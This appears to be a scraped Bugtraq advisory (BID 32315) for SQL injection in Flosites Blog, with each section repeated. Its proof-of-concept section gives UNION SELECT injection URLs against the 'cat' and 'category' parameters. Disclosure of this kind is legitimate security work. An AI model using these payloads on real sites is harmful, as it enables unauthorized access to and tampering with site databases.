Flosites Blog SQL Injection Vulnerabilities
BID:32315
Info
Flosites Blog SQL Injection Vulnerabilities
| Bugtraq ID: | 32315 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Nov 16 2008 12:00AM |
| Updated: | Nov 17 2008 05:04PM |
| Credit: | Vrs-hCk |
| Vulnerable: |
Flosites Flosites Blog 0 |
| Not Vulnerable: | |
Discussion
Flosites Blog SQL Injection Vulnerabilities
Flosites Blog is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Flosites Blog is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Exploit / POC
Flosites Blog SQL Injection Vulnerabilities
Attackers can use a browser to exploit these issues.
The following example URIs are available:
http://www.example.com/blog/index.php?cat=-1+union+select+1,version(),3/*
http://www.example.com/blog/index.php?category=-1+union+select+1,version(),3/*
Attackers can use a browser to exploit these issues.
The following example URIs are available:
http://www.example.com/blog/index.php?cat=-1+union+select+1,version(),3/*
http://www.example.com/blog/index.php?category=-1+union+select+1,version(),3/*
Solution / Fix
Flosites Blog SQL Injection Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].